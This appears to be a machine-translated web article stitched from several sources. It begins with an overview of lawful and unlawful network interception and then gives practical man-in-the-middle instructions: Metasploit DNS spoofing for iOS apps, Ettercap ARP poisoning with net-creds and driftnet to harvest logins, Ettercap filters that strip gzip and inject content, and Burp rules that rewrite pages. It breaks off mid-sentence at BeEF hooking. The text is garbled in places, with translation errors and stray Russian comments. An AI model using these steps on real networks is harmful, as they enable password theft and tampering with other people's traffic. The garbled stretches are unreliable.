Hackers use to redirect traffic. Redirecting SSH and HTTP traffic

Interception of data over the network is considered to be the receipt of any information from a remote computer device. It may consist of the user's personal information, his messages, records of visiting websites. Data capture can be carried out by spyware or using network sniffers.

Spyware is a special software, capable of recording all information transmitted over the network from a specific workstation or device.

A sniffer is a program or computer equipment, which intercepts and analyzes the traffic that passes through the network. The sniffer allows you to connect to a web session and perform various operations on behalf of the computer owner.

If the information is not transmitted in real time, spyware generate reports that are convenient to view and analyze information.

Network eavesdropping may be organized legally or performed illegally. The main document fixing the legality of the acquisition of information is the Convention on Cybercrime. It was founded in Hungary in 2001. The legal requirements of different states may vary slightly, but the key meaning is the same for all countries.

Classification and methods of intercepting data over the network

In accordance with the above, the interception of information over the network can be divided into two types: authorized and unauthorized.

Authorized data capture is carried out for various purposes, ranging from protecting corporate information to ensuring the security of the state. The grounds for performing such an operation are determined by legislation, special services, law enforcement officers, specialists from administrative organizations and company security services.

There are international standards for performing data interception. The European Telecommunications Standards Institute has managed to bring to a single standard a number of technical processes (ETSI ES 201 158 "Telecommunications security; Lawful Interception (LI); Requirements for network functions"), on which the interception of information is based. As a result, a system architecture was developed that helps secret service specialists, network administrators to legally take over data from the network. The developed structure for the implementation of data interception over the network is applied to wired and wireless voice calling systems, as well as to correspondence by mail, transmission voice messages by IP, information exchange by SMS.

Unauthorized interception of data over the network is carried out by intruders who want to take possession of confidential data, passwords, corporate secrets, addresses of computer machines on the network, etc. To achieve their goals, hackers usually use network analyzer traffic - sniffer. This program or a hardware-software type device gives a fraudster the ability to intercept and analyze information within the network to which the victim user is connected, including encrypted SSL traffic through the substitution of certificates. Traffic data can be captured in different ways:

listening on the network interface,
connecting an interceptor to a channel break,
creating a traffic branch and duplicating it on a sniffer,
by conducting an attack.

There are also more sophisticated technologies for intercepting sensitive information that allow intruding into network interaction and changing data. One such technique is bogus ARP requests. The essence of the method is to spoof IP addresses between the victim's computer and the attacker's device. Another method that can be used to intercept data over the network is decoy routing. It consists in substituting the IP address of the network router with its own address. If a cybercriminal knows how the local network in which the victim is located is organized, then he can easily organize the receipt of information from the user's machine to his IP address. Capturing a TCP connection also serves in an efficient way data interception. An attacker interrupts a communication session by generating and sending TCP packets to the victim's computer. Further, the communication session is restored, intercepted and continued by the criminal instead of the client.

Object of influence

The objects of data interception over the network can be government agencies, industrial enterprises, commercial structures, ordinary users. Inside an organization or business company, information capture can be implemented in order to protect the network infrastructure. Special services and law enforcement agencies can carry out mass interception of information transmitted from different owners, depending on the task.

If we talk about cybercriminals, then any user or organization can become an object of influence in order to obtain data transmitted over the network. With authorized access, the informative part of the information received is important, while the attacker is more interested in data that can be used to seize money or valuable information for its subsequent sale.

Most often, the victims of information interception by cybercriminals are users connecting to a public network, for example, in a cafe with a dot WiFi access. An attacker connects to a web session using a sniffer, replaces data and steals personal information. More details on how this happens are described in the article.

Threat Source

Authorized interception of information in companies and organizations is carried out by public network infrastructure operators. Their activities are aimed at protecting personal data, trade secrets and other important information. On legal grounds, the transfer of messages and files can be monitored by special services, law enforcement agencies and various government agencies to ensure the safety of citizens and the state.

Attackers are engaged in illegal interception of data. In order not to become a victim of a cybercriminal, you need to follow some recommendations from experts. For example, you should not perform operations that require authorization and transfer of sensitive data in places where the connection is made to public networks. It is safer to choose encrypted networks, and even better, use personal 3G and LTE modems. When transferring personal data, it is advised to encrypt it using the HTTPS protocol or a personal VPN tunnel.

Protect your computer from interception network traffic it is possible with the help of cryptography, anti-sniffers; dial-up rather than wireless network access will mitigate risks.

In this article, we'll look at proxying the traffic of iOS applications that use native web sockets to interact with the server. The article will be useful to those pentesters who encounter in their work the interception of confidential information sent by iOS applications in non-standard ways. These methods are relevant because the use default settings The proxy server on the device may not be sufficient to intercept the traffic of some applications.

Recently, during another pentest, I came across an application that sent information to port 20xx of a web server. The traffic of this application could not be intercepted by changing the default settings (Settings -> Wi-Fi -> HTTP Proxy -> Manual) and redirecting traffic to a proxy. One of the reasons why this method doesn't work is that native web sockets (native websockets) are used to communicate with the server instead of the UIWebView class. For more information on how web sockets are configured, see this article.

However, there is a workaround to solve this problem. We can implement DNS spoofing and redirect all HTTP traffic from all ports through a proxy like Burp. This article is divided into parts:

Sniffing traffic with Wireshark to find the IP address and port of the server.
DNS spoofing and forwarding all traffic to the machine where the proxy is installed.
Interception of traffic using a proxy server after performing DNS spoofing.

Below is a step-by-step diagram for implementing traffic interception for iOS applications using Native Web Socket.

1. Create a wireless access point and connect the device to it. [Note: The machine must be connected to Ethernet or otherwise connected to the Internet, since the Wi-Fi interface will be used for the hotspot. This article talks about how to set up a hotspot on a Windows machine]

2. We launch a network sniffer (for example, Wireshark) and look for traffic passing through non-standard ports.

a. We filter traffic, leaving only the one that goes to the IP address we need (ip.dst == ip.ip.ip.ip)

b. Find the port number to which the traffic is sent.

Figure 1: Finding the non-standard port to which the application sends traffic

3. Launch the Metasploit DNS spoofing console and enter the following commands:

c. set SRVHOST = (Wireless Access Point IP)

d. set SRVPORT = 53, set TARGETACTION = BYPASS, set TARGETDOMAIN = www.apple.com (Note: setting TARGETDOMAIN= www.apple.com will intercept all traffic except from apple.com).

e. set targethost = (wireless hotspot IP)

Figure 2: DNS setting server using the fakedns module (inMetasploit)

4. Configure Burp to listen for incoming device traffic on specific ports and redirect it to the port found earlier.

a. Go to Proxy->Options->Add; set "bind port" to the port to which the application should forward traffic (note: this is one of those non-standard tcp ports that was found using Wireshark).

b. We listen to all interfaces.

c. In the Request Handling tab, set the server domain (the Redirect to host field).

d. In the same tab, set the corresponding port number (field Redirect to port).

e. If the traffic is sent via https, we set the forced use of SSL.

f. Click OK and repeat all of the above operations for all ports to which the application sends traffic. In other words, each port needs a separately configured proxy listener.

Figure 3: Configuring listening and redirecting traffic

5. Configure the proxy settings on the device:

a. We go to the Wi-Fi->DHCP section and set DNS = to the IP address of the access point.

b. In the HTTP proxy settings, we set the IP address of the access point and the corresponding port on which burp is configured (these settings are used to proxy standard HTTP traffic).

Figure 4: IP configuration andDNS forwardingon device

6. Type in the Metasploit console "exploit" and you will see all the intercepted traffic from non-standard ports.

The described method can be used to circumvent problems with traffic interception of iOS applications that transmit it in non-standard ways.

Ettercap Alternatives

Ettercap is the most popular man-in-the-middle attack program, but is it the best? Throughout the instructions, you will see that Ettercap is almost never used alone, that one or another program is always lined up with it in a traffic processing chain. Perhaps this adds flexibility, in general, this approach is at the heart of UNIX - one program performs one task, and the end user combines various programs to achieve the desired result. With this approach, the program code is easier to maintain; such miniature "bricks" can be used to build a system of any complexity and flexibility. However, have five open consoles with different tasks, the work of programs of which is aimed at achieving one single result - this is not very convenient, it's just more difficult, there is a chance of making a mistake at some stage, and the entire configured system will run idle.

Net-Creds sniffs:

Visited URLs
sent POST requests
logins/passwords from HTTP forms
logins/passwords for basic HTTP authentication
HTTP lookups
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
all supported NTLMv1/v2 protocols like HTTP, SMB, LDAP, etc.
Kerberos

A good selection of intercepted images, and driftnet is simpler in this regard - it only shows intercepted images.

Switch your machine to forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

Run Ettercap with GUI (-G):

Ettercap-G

Now choose hosts, it has a subparagraph Scan for hosts. After scanning is complete, select host list:

As Goals1 select router ( Add to Target 1), as Goals2 select the device you want to attack ( Add to Target 2).

But here the first hitch may arise, especially if there are many hosts. In various instructions, including in the video presented above, the authors climb into the target machine (for some reason, everyone has Windows there) and use the command to look at the IP of this machine in local network. Agree, this option is unacceptable for real conditions.

If you scan with , then you can get some Additional information about hosts, more precisely, about the manufacturer of the network card:

nmap -sn 192.168.1.0/24

If the data is still not enough, then you can do a scan with the definition of the OS:

nmap -O 192.168.1.0/24

As you can see, the machine with IP 192.168.1.33 turned out to be Windows, if this is not a sign from above, then what is it? 😉 lol

That is what we add as the second goal.

Now let's move on to the menu item. Mitm. There select ARP poisoning… Check the box Sniff remote connections.

We start harvesting, in one window we launch

Net credits

in another (both programs can be run without options)

drift net

Data collection began immediately.

On the right side, driftnet has opened another window that shows captured images. In the net-creds window, we see visited sites and intercepted passwords:

1.2 Ettercap + Burp Suite

3. View data (websites visited and captured passwords) in Ettercap

On the menu view we have tabs available Connections And profiles. You can also check the box Resolve IP addresses(translate IP addresses). Connections are, of course, connections. Ettercap collects in-memory profiles for each host it discovers. Users and passwords are collected there. In this case, profiles with captured account data (passwords) are marked with a cross:

Do not rely too much on profiles - for example, intercepted logins and passwords for FTP and other services are marked, for which the program can unequivocally interpret the information received as credentials. This does not include, for example, basic authentication data, entered logins and passwords in web forms.

In Connections, the most promising data is marked with an asterisk:

You can double click on these entries to view the details:

In order not to search for these stars in the entire list, you can sort by this field and they will all be at the top or bottom:

Caught basic authentication:

These are the intercepted credentials for Vkontakte:

Also, the most interesting data is collected in the lower console:

If you want to save the results of the program, then use these options (specify the keys when starting Ettercap:

Logging options: -w, --write<файл>write captured data to pcapfile<файл>-L, --log<логфайл>write all traffic to this<логфайл>-l, --log info<логфайл>write only passive information to this<логфайл>-m, --log-msg<логфайл>write all messages to this<логфайл>-c, --compress use gzip compression for log files

4. Data substitution on the fly in Ettercap

4.1 Using Custom Ettercap Filters

Note: In all my testing, the Ettercap filters did not work. It's hard to understand whether it's in the hands, in the hardware features or in a bug in the program itself ... But for version 0.8.2 (the latest at the moment), there is a bug report about problems with filters. In general, judging by the bug reports and forums, the filters either fall off often, or do not work at all for a long time. There is a branch that was modified 5 months ago https://github.com/Ettercap/ettercap/tree/filter-improvements, i.e. filter-improvements (with filter improvements). A wide variety of tests were made for this branch and for the version from the repository, various filters were tested in different conditions, a lot of time was spent, but there was no result. By the way, to set the version of filter-improvements to Kali Linux you need to do this:

sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ make sudo make install

In general, if your filters do not work, then you are not alone. In the instructions for Ettercap, I cannot skip the topic of filters, so they will be considered anyway.

So far we have been using Ettercap for ARP spoofing. This is a very superficial application. Thanks to custom filters, we can intervene and change traffic on the fly. Filters should be in separate files and must be compiled with the Etterfilter program before use. Although the documentation to which the link is given seems to be short, but coupled with the examples below, it will allow you to write quite interesting filters.

Let's create our first filter, it will replace all images with this:

In a file named img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # note: the replacement string is the same length as the original msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=", " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Compile the file:

Etterfilter img_replacer.filter -o img_replacer.ef

Compilation results:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protocol tables loaded: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 constants loaded: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file "img_replacer.filter" done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to "img_replacer.ef" done. -> Script encoded into 18 instructions.

Key -F tells the program to load the filter from the file that follows the key. After compilation, the name of our new file with the filter is img_replacer.ef, so the command becomes:

Ettercap -G -F img_replacer.ef

Note A: When you monitor web traffic, the packets you see may be in encoded form. For effective work filters, Ettercap needs plain text traffic. According to some observations, the type of encoding that web pages use is "Accept-Encoding: gzip, deflate"

Below is a filter that overwrites the encoding, forcing communication in the form of plain text:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # note: four spaces in msg string to replace ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # note: seven spaces in replacement string msg("whited out deflate\n"); ) )

The syntax for writing filters is described in detail, and then a few more examples:

# replace text in packet: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # show message if tcp port is 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # log all telnet traffic, also execute ./program per packet if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log "); exec("./program"); ) ) # log all traffic except http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # some packet payload operations if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modified"; DATA .data + 20 = 0x4445; ) # drop all packets containing "ettercap" if (search(DECODED.data, "ettercap")) ( msg("some one is talking about us...\n"); drop( ); kill(); ) # write decrypted ssh packets matching regular expression if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packets if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Data spoofing with Burp

We launch Ettercap and Burp as described in paragraph 1.2 or in paragraph 2.2.

In Burp go to Proxy -> Options. We find there Match and Replace. Click Add to add a new rule.

Request header is the request header
request body- request body
response header- response header
response body- response body
Request paramname- Query parameter name
Request param value- Request parameter value
Request first line- First line of the query

If you need to change the data transmitted by the GET method, then this applies to the headers.

In HTML markup, there is also such a thing as head (head tag). Those mentioned above have nothing to do with this heading. A little higher it is said about packet headers. If you want to change the content HTML pages, then you should always choose Response body instead of Request header, even if you are going to change the content of the head tag (for example, the title).

If you are not familiar with regular expressions, then, in principle, it's okay: HTML forgives a lot, and what it does not understand, it simply ignores - you can use it. If you know how to use regular expressions, then I respect you.)))

For example, let's create a new rule, change the Request header to Response body. In the rule itself, we will change

.*<\/title> </p><p> <title>no title

Check the box Regex match.

Now on all sites (without HTTPS) instead of the title there will be No Title:

Insert an arbitrary line after the body tag (it will be the first line in the text). Request header is changed to Response body. We change

Check the box Regex match.

In the upper right corner (depending on layout) appears the inscription "I am cool!". You can insert CSS, JavaScript code, any text - anything. You can generally remove everything from the page, and then fill it with your own content - it all depends on your imagination.

There was an idea to slightly modify each form so that the data is sent to the original server and to the attacker's server (implement multi submit for each form). But having reasoned that if the transmitted data is not encrypted and we have access to it, then we see it anyway, we don’t need to send it to any server. Nevertheless, if someone needs it, a really working example of sending data from one form to several servers at once.

5. BeEF hookup

To start using the BeEF features, we need to embed a JavaScript file in the HTML, usually a line like: